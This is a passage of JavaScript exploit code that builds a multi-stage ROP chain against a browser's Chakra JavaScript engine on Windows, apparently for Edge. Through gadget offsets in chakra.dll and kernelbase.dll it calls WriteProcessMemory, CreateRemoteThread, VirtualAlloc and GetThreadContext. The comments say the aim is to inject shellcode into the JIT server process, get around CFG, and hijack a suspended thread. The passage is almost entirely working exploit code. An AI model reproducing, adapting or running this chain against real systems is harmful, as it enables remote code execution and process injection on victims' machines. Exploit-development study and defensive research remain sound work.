write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
next();
